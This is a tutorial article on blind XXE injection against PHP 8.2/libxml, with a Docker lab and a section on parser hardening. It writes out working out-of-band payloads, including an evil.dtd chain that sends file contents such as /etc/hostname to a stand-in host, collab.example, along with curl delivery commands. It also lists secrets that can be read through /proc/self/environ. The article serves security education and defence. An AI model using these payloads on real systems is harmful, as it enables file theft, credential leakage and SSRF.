Blind XXE is the variant of XML External Entity injection where the application parses the attacker's XML, never reflects any field back, and returns a flat OK regardless of what the parser found. The bug is real, the response body is silent, and the only way I prove anything is by forcing the parser to make a side-channel network request to a host I control. Against modern libxml the picture is split in two: the direct external-entity OOB probe still fires, the textbook recursive parameter-entity DTD chain that every older write-up demonstrates does not. This article walks both, against a Dockerised lab, on the parser PHP 8.2 actually ships.
TL;DR
A blind XXE endpoint parses attacker XML and returns nothing useful in the response body. To prove the bug exists I need an out-of-band channel: a host I control whose access log or DNS log captures requests the vulnerable parser issues on my behalf. Two payload shapes matter. The direct external-entity reference puts an HTTP URL in a general entity's SYSTEM value and references the entity in the document body; libxml fetches the URL while resolving the entity, my collaborator logs the GET, the bug is proven. This still fires on libxml 2.9.14 (PHP 8.2). The recursive parameter-entity chain via an external DTD, the pattern every PortSwigger walk-through uses to exfiltrate file contents through a second-stage GET, does not fire end to end on modern libxml: the DTD loads, the second-stage request never lands. Both patterns are worth knowing because plenty of production parsers are not modern libxml. Burp Collaborator and Interactsh are the listener side; the technique is identical regardless of which one I pick.
Why blind XXE matters when in-band reflection does not work
A lot of endpoints parse XML and never echo any field back. Webhook receivers, async importers, SAML metadata consumers, SOAP services with a generic "accepted" envelope, document upload pipelines that queue the parse and respond before the worker runs. The textbook in-band XXE demo, where I read /etc/passwd straight out of the HTTP response, assumes the application surfaces parsed content. Half the XXE-shaped endpoints I look at do not.
That does not mean those endpoints are safe. If the parser still dereferences external entities, the side effect of parsing is an outbound request from inside the application's network position. That side effect is the bug. A successful collaborator hit is the difference between "we suspect this parser is misconfigured" and "we have a packet that says it is", and even when file-content exfil is closed off by hardening, the OOB primitive is still a usable SSRF gadget against internal HTTP services that the attacker cannot reach directly.
The two payload shapes that matter
Direct external-entity reference (fires on libxml 2.9.14)
The minimal OOB probe. A single <!ENTITY> declaration in the inline DOCTYPE, a SYSTEM URI pointing at my collaborator, and a reference to that entity somewhere in the document body so the parser is forced to resolve it:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://collab.example/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>When the parser walks the tree and hits &exfil;, it dereferences the SYSTEM URI to resolve the entity's substitution text. libxml issues an outbound HTTP GET to collab.example/?leak=fired. The collaborator logs the request. The application's response can be a literal OK and the bug is still proven.
What this payload does not do is exfiltrate file content. There is no way to bake /etc/passwd into the query string through a single general entity; the substitution layer that would let me do that is the parameter-entity layer in the next section, and that is where the hardening lives. Direct OOB proves the primitive and confirms egress. For SSRF gadgets that is already enough.
Recursive parameter entity in an external DTD (does not fire on libxml 2.9.14)
This is the textbook chain. Older PortSwigger labs, older write-ups, and most XXE training material build OOB up through this pattern, because it is the one that does exfiltrate file content when it works.
The inline DOCTYPE loads a remote DTD via a parameter entity and forces the parameter entity to expand:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://collab.example/evil.dtd">
%remote;
]>
<bookmarks>
<bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>The remote evil.dtd reads a local file into one parameter entity, then uses a second parameter entity to declare a third general or parameter entity whose SYSTEM URI embeds the first file's contents in its query string, then forces that third entity to resolve so the contents leave the host in the query string of a second outbound request:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://collab.example/?x=%file;'>">
%eval;
%exfil;
Against an older libxml this chain runs end to end: the DTD loads, the file is read, the second GET arrives at the collaborator with the file's contents in the URL. Against modern libxml only the first step fires. The collaborator sees GET /evil.dtd, the second request never lands, the bytes never leave.
What libxml actually changed
The full timeline lives in the parent article on XML External Entity injection. The two checkpoints that matter for blind OOB:
libxml 2.9.0 (September 2012) flipped external-entity loading off by default. Callers have to opt back in with XML_PARSE_NOENT (in C) or LIBXML_NOENT (in PHP). Every textbook XXE payload from before 2013 assumed external entities loaded by default; from 2013 onward, blind XXE requires an application that has explicitly turned the feature back on. Plenty of real production code does, usually because someone needed DTD-based validation and turned everything on rather than just LIBXML_DTDLOAD.
libxml 2.9.x parameter-entity hardening (2014 onward). The 2.9.x line tightened how parameter entities loaded from an external DTD interact with subsequent entity definitions. libxml now refuses to define a new entity inside the expansion of a parameter entity loaded from an external DTD, which is the exact mechanic the recursive chain depends on. The change rolled out incrementally across 2.9.4, 2.9.10, and the subsequent point releases. By 2.9.14 (the libxml PHP 8.2 ships), the recursive PE-DTD chain is closed.
Today's production stacks land in three buckets: PHP 8.2 / 8.3 and modern Python lxml on libxml 2.9.14 close the recursive chain but leave direct OOB intact; Java DocumentBuilder behaviour depends on the JDK and whether FEATURE_SECURE_PROCESSING is set, and many enterprise SAML and SOAP servers still have both patterns working; legacy on-prem appliances and anything statically linking pre-2.9.4 libxml are fully exposed, file-content exfil and all.
Lab walkthrough
The xxe-basic lab in the techearl-labs repo ships PHP 8.2 with libxml 2.9.14 and parses incoming XML with LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA. That is the unsafe combination: external entities are substituted, the inline DOCTYPE is allowed to dereference SYSTEM URIs, XInclude is opted into on a separate endpoint. The blind endpoint is /upload-blind.php and returns OK regardless of what the parser found.
Boot it:
docker compose up xxe-basicThe companion xxe-basic-collab container is a tiny Python HTTP server on the same Docker network with no published port; only the lab can reach it. It serves evil.dtd and logs every request to stdout. Tail it in a second terminal:
docker compose logs -f xxe-basic-collabPattern 1: direct entity OOB fires
Save the direct-entity payload to payload-direct.xml (note that the URL points at the collaborator inside the Docker network, not at a public collaborator):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>POST it to the blind endpoint:
curl -s -X POST --data-binary @payload-direct.xml \
-H 'Content-Type: application/xml' \
http://localhost:8086/upload-blind.phpThe application returns OK. The collaborator log shows a line of the shape:
[collab] GET from 172.18.0.3 path=/?leak=fired
That GET is the OOB primitive firing. The parser dereferenced the external entity by issuing an outbound HTTP request to a host the attacker controls, while the application's response gave nothing away.
Pattern 2: recursive PE-DTD chain does not fire
The textbook chain, saved to payload-recursive.xml:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
%remote;
]>
<bookmarks>
<bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>The evil.dtd on the collaborator reads /etc/hostname and declares a second-stage exfil entity that embeds the content in a query string. POST it:
curl -s -X POST --data-binary @payload-recursive.xml \
-H 'Content-Type: application/xml' \
http://localhost:8086/upload-blind.phpThe collaborator log shows exactly one line:
[collab] GET from 172.18.0.3 path=/evil.dtd
The DTD loaded. The second-stage GET that was supposed to carry the file contents never arrives. That gap is the libxml 2.9.x hardening at work. The same payload against libxml 2.9.3 produces a second GET with the hostname in its query string.
A clean negative on the recursive pattern does not mean "no XXE here", just "no XXE through this chain on this parser". Try the direct-entity probe first, fall back to XInclude, and only then conclude the parser is hardened.
Setting up an external collaborator
The lab uses an in-network collaborator container to keep everything offline. Against a real target you need a host whose DNS or HTTP logs you can read. The realistic options are Burp Collaborator (PortSwigger's hosted service, bundled with Burp Pro), Interactsh (ProjectDiscovery's open-source equivalent, hosted at oast.fun or self-hostable on a VPS with an NS-delegated subdomain), and browser-accessible loggers like dnslog.cn, requestbin.com, oast.live, or webhook.site for one-off probes. The probe pattern is identical regardless of which one you pick: put the collaborator's hostname in the SYSTEM URI of the entity, send the payload, watch the listener.
What you can exfiltrate
The direct-entity primitive on a modern libxml proves the parser is misconfigured, confirms outbound HTTP egress (the same primitive that powers cloud-metadata SSRF), and surfaces any fields the application appended to the URL (a templated Host header, a customer ID in the path) that you did not write yourself.
The recursive PE-DTD chain, when it works against older parsers or badly-configured Java SAML, gives you file contents via file:///etc/passwd, file:///etc/hostname, the application's own config files, and environment variables through file:///proc/self/environ on Linux. The environ read is where credentials leak: cloud keys, database passwords, signing secrets, whatever the application read at startup. On Java parsers that allow it, the jar:// and netdoc:// URL schemes extend the reach further. On PHP with stream wrappers enabled, php://filter bypasses character-set issues with binary file reads.
The fix
The defence is the same as for the parent class, repeated here so this article stands on its own:
- Disable external entity resolution on every XML parser that touches untrusted input. In PHP, do not pass
LIBXML_NOENTand do not passLIBXML_DTDLOADtoloadXML. The defaults since libxml 2.9.0 are correct. - In Java, set
XMLConstants.FEATURE_SECURE_PROCESSINGon everyDocumentBuilderFactory,SAXParserFactory,XMLInputFactory, andTransformerFactory, plus thedisallow-doctype-decl,external-general-entities,external-parameter-entities, andload-external-dtdfeatures set to the safe values. The OWASP XXE Prevention Cheat Sheet has the full list. - In .NET, use
XmlReaderSettings { DtdProcessing = Prohibit, XmlResolver = null }. - In Python, use defusedxml for stdlib parsers, and configure
lxmlwithXMLParser(resolve_entities=False, no_network=True, load_dtd=False). - Prefer JSON for new APIs. JSON parsers have no entity-resolution layer; the class is closed off by construction.
- Default-deny outbound HTTP and outbound DNS at the application VPC layer. No egress means no OOB. The detection signal that catches blind SSRF (alerting on outbound DNS queries to unusual TLDs from services that have no business resolving external domains) catches blind XXE for the same reasons. See the detection notes in blind SSRF.
Real-world incidents
XXE-OOB has a long CVE history. Three that are worth knowing:
- CVE-2018-8033 in Apache OFBiz. The
SOAPEventHandler(and the related XML-RPC surface) parsed user-supplied XML with external entities enabled, giving an unauthenticated attacker the direct external-entity OOB primitive against any internet-exposed OFBiz instance before 16.11.04. The pattern repeats across Java middleware wherever an XML-RPC or SOAP endpoint has not been touched since the parser defaults were unsafe. - The 2014 Facebook XXE reported by Reginaldo Silva (writeup). The canonical OOB-XXE-to-RCE escalation: Silva used PHP's
expect://stream wrapper to turn an XXE primitive into a shell on Facebook's parser host. The OOB confirmation was the first signal; the wrapper was the escalation. The lesson Facebook's payout encoded is that an XXE finding is never just "information disclosure", because the primitive composes with whatever stream wrappers the parser supports. - Mid-2010s enterprise XXE drip. Confluence, Jenkins, various Atlassian and Cisco products filed a steady run of XXE CVEs whose XML parsers were configured in 2010 and never revisited. Most were OOB-confirmed in disclosure write-ups even when the public fix notes describe the impact as "information disclosure". The takeaway: XXE rarely appears in greenfield code, frequently survives in legacy SOAP and SAML endpoints, and the OOB primitive is usually the first signal that something is wrong.
Where to go next
The parent article on XML External Entity injection covers the in-band file-read variant, XInclude (the entirely separate code path that bypasses entity-based defences), billion-laughs DoS, and the per-language hardening for Java, .NET, Python, and Go. The sibling variant on blind SSRF covers the OOB primitives and the detection layer in more depth, including the random-subdomain DNS detection signal that catches both classes. The hub page is the web application security vulnerabilities taxonomy.
Sources
Authoritative references this article was fact-checked against.
- PortSwigger, Blind XXEportswigger.net
- ProjectDiscovery, Interactshgithub.com
- libxml2 releasesgitlab.gnome.org





